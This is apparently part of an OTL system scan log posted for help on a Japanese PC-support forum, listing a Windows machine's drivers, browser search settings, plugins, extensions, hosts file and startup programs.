DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,086,336 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,039,744 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:[b]64bit:[/b] - [2014/10/08 18:24:09 | 000,467,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,324,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,189,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:[b]64bit:[/b] - [2014/10/07 15:44:39 | 000,069,952 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:[b]64bit:[/b] - [2014/10/01 19:54:16 | 003,828,152 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2014/09/24 16:27:11 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:[b]64bit:[/b] - [2014/09/24 15:58:01 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:48 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:[b]64bit:[/b] - [2014/09/24 15:29:18 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:[b]64bit:[/b] - [2014/08/15 09:36:55 | 000,146,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,038,296 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,027,032 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2013/08/22 21:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:[b]64bit:[/b] - [2013/08/22 21:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:[b]64bit:[/b] - [2013/08/22 20:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:[b]64bit:[/b] - [2013/08/22 17:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:[b]64bit:[/b] - [2013/08/13 08:25:46 | 000,017,624 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:[b]64bit:[/b] - [2013/08/10 09:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:[b]64bit:[/b] - [2013/08/06 15:13:30 | 000,023,040 | ---- | M] (Apple Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netaapl64.sys -- (Netaapl)
DRV:[b]64bit:[/b] - [2013/07/31 03:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:[b]64bit:[/b] - [2013/07/26 04:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:[b]64bit:[/b] - [2013/06/18 23:44:59 | 000,129,224 | ---- | M] (Qualcomm Atheros Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\L1C63x64.sys -- (L1C)
DRV:[b]64bit:[/b] - [2013/04/04 14:50:32 | 000,025,928 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:[b]64bit:[/b] - [2012/09/01 18:01:56 | 000,647,736 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/08/14 18:03:34 | 002,206,352 | ---- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\viahduaa.sys -- (VIAHdAudAddService)
DRV:[b]64bit:[/b] - [2012/07/02 15:16:02 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/19 07:40:50 | 000,342,528 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2010/08/11 23:51:48 | 001,587,968 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ksaud.sys -- (ksaud)
DRV:[b]64bit:[/b] - [2010/07/05 13:47:00 | 000,565,248 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\GVUSB2.X64.SYS -- (GVUSB2.X64)
DRV - [2012/07/05 10:46:18 | 000,125,544 | ---- | M] () [Kernel | System | Stopped] -- C:\ProgramData\Kingsoft\klive\bin\encrypteddisk-x64.sys -- (EncryptedDisk)
DRV - [2007/07/06 15:34:36 | 000,016,800 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\RAWESR.sys -- (RAWESR)
DRV - [2007/07/06 15:34:34 | 000,013,600 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\LOGNT.SYS -- (LOGNT)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\NTSTPL2.SYS -- (NTSTPL2)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\ntstpl1.sys -- (NTSTPL1)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OCustomizeSearch =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OSearchAssistant =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant =
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{726DA24E-A4A1-62E5-72EA-44C7886452CB}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS


IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages =
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?FORM=UP97DF&PC=UP97&q={searchTerms}&src=IE-SearchBox
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:37.0.1
FF - user.js - File not found

FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@gamepot.co.jp/GamepotEXeEnvCtrl;version=1: C:\Program Files (x86)\Gamepot\GPEXE\\npGPEXE.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\pmang.jp/pmangsupport-1: C:\Users\ryota\Desktop\新しいフォルダー\GameOn\TERA\nppmangsupport_0.dll (gameon)
FF - HKCU\Software\MozillaPlugins\@neople.co.kr/NeopleGameInstaller: C:\ProgramData\NeoplePlugin\npNeopleGameInstaller.dll ( )

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: c:\program files (x86)\Mozilla Firefox\components [2014/08/30 11:40:53 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: c:\program files (x86)\Mozilla Firefox\plugins

[2014/05/16 21:28:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ryota\AppData\Roaming\mozilla\Extensions
[2015/04/04 19:27:38 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/04/04 19:25:26 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage:
CHR - plugin: Error reading preferences file
CHR - Extension: Google 繝峨く繝･繝｡繝ｳ繝・ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\
CHR - Extension: Google 繝峨Λ繧､繝・ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\
CHR - Extension: YouTube = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: Google Search = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: Avira Browser Safety = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk\1.4.6_0\
CHR - Extension: Google 繧ｦ繧ｩ繝ｬ繝・ヨ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\

OTLログの続きです。


O1 HOSTS File: ([2015/04/21 22:18:53 | 000,000,098 | ---- | M]) - C:\Windows\SysNative\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O3 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\Toolbar\WebBrowser: (no name) - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - No CLSID value found.
O4:[b]64bit:[/b] - HKLM..\Run: [Creative SB Monitoring Utility] C:\WINDOWS\SysNative\SBAVMon.dll (Creative Technology Ltd.)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxTray.exe (Intel Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [au_WiFi_Connect] C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe ()
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [eochk] File not found
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe (VIA)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe (Kingsoft Corp. Ltd.)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe (i-Funbox.com)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [Line] C:\Program Files (x86)\Naver\LINE\Line.exe (LINE Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [OneDrive] C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\RunOnce: [Application Restart #0] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
